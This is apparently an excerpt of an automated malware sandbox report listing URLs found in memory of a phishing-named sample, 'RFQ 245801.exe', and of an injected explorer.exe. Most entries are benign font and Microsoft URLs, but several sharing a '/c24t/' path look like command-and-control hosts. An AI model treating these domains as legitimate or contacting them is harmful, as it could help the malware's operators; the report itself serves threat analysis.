Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.earing-tests-69481.bond/c24t/
Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.earing-tests-69481.bond/c24t/www.458881233.men
Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.earing-tests-69481.bondReferer:
Source: RFQ 245801.exe, 00000000.00000002.1752637973.0000000006C72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com
Source: RFQ 245801.exe, 00000000.00000002.1752637973.0000000006C72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: RFQ 245801.exe, 00000000.00000002.1752637973.0000000006C72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: RFQ 245801.exe, 00000000.00000002.1752637973.0000000006C72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: RFQ 245801.exe, 00000000.00000002.1752637973.0000000006C72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: RFQ 245801.exe, 00000000.00000002.1752637973.0000000006C72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: RFQ 245801.exe, 00000000.00000002.1752637973.0000000006C72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: RFQ 245801.exe, 00000000.00000002.1752637973.0000000006C72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: RFQ 245801.exe, 00000000.00000002.1752637973.0000000006C72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fonts.com
Source: RFQ 245801.exe, 00000000.00000002.1752637973.0000000006C72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: RFQ 245801.exe, 00000000.00000002.1752637973.0000000006C72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: RFQ 245801.exe, 00000000.00000002.1752637973.0000000006C72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: RFQ 245801.exe, 00000000.00000002.1752637973.0000000006C72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: RFQ 245801.exe, 00000000.00000002.1752637973.0000000006C72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: RFQ 245801.exe, 00000000.00000002.1752637973.0000000006C72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.ilw.legal
Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.ilw.legal/c24t/
Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.ilw.legal/c24t/www.02s-pest-control-us-ze.fun
Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.ilw.legalReferer:
Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.j88.travel
Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.j88.travel/c24t/
Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.j88.travel/c24t/www.venir-bienne.info
Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.j88.travelReferer:
Source: RFQ 245801.exe, 00000000.00000002.1752637973.0000000006C72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.khizmetlergirisyapzzz2024.net
Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.khizmetlergirisyapzzz2024.net/c24t/
Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.khizmetlergirisyapzzz2024.net/c24t/www.lc-driving-school.net
Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.khizmetlergirisyapzzz2024.netReferer:
Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.lc-driving-school.net
Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.lc-driving-school.net/c24t/
Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.lc-driving-school.net/c24t/www.aithful.events
Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.lc-driving-school.netReferer:
Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.oko.events
Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.oko.events/c24t/
Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.oko.events/c24t/www.earing-tests-69481.bond
Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.oko.eventsReferer:
Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.orenzoplaybest14.xyz
Source: explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.orenzoplaybest14.xyz/c24t/
Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.orenzoplaybest14.xyzReferer:
Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.ridges-freezers-56090.bond
Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.ridges-freezers-56090.bond/c24t/
Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.ridges-freezers-56090.bond/c24t/www.oko.events
Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.ridges-freezers-56090.bondReferer:
Source: RFQ 245801.exe, 00000000.00000002.1752637973.0000000006C72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: RFQ 245801.exe, 00000000.00000002.1752637973.0000000006C72000.00000004.00000800.00020000.00000000.sdmp, RFQ 245801.exe, 00000000.00000002.1752289178.0000000005400000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.sakkal.com
Source: RFQ 245801.exe, 00000000.00000002.1752637973.0000000006C72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.sx9u.shop
Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.sx9u.shop/c24t/
Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.sx9u.shop/c24t/www.consuyt.xyz
Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.sx9u.shopReferer:
Source: RFQ 245801.exe, 00000000.00000002.1752637973.0000000006C72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.tiro.com
Source: RFQ 245801.exe, 00000000.00000002.1752637973.0000000006C72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.typography.netD
Source: RFQ 245801.exe, 00000000.00000002.1752637973.0000000006C72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.venir-bienne.info
Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.venir-bienne.info/c24t/
Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.venir-bienne.info/c24t/www.ridges-freezers-56090.bond
Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.venir-bienne.infoReferer:
Source: RFQ 245801.exe, 00000000.00000002.1752637973.0000000006C72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: explorer.exe, 00000006.00000002.4160246853.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1749071753.000000000C893000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
Source: explorer.exe, 00000006.00000002.4151697507.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1739582157.00000000079FB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/Vh5j3k
Source: explorer.exe, 00000006.00000002.4151697507.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1739582157.00000000079FB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/odirmr
Source: explorer.exe, 00000006.00000000.1749071753.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000006.00000000.1743773191.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4156756426.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3116314760.00000000097D4000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000006.00000000.1743773191.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4156756426.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3116314760.00000000097D4000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/q
Source: explorer.exe, 00000006.00000003.3116867213.000000000371C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3113868661.000000000370D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1736214563.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4142888075.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1729409948.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4145708361.000000000371D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000006.00000002.4156756426.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3116314760.0000000009701000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1743773191.00000000096DF000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
Source: explorer.exe, 00000006.00000000.1743773191.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4156756426.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3116314760.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 00000006.00000002.4156756426.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3116314760.0000000009701000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1743773191.00000000096DF000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://arc.msn.comi
Source: explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
Source: explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
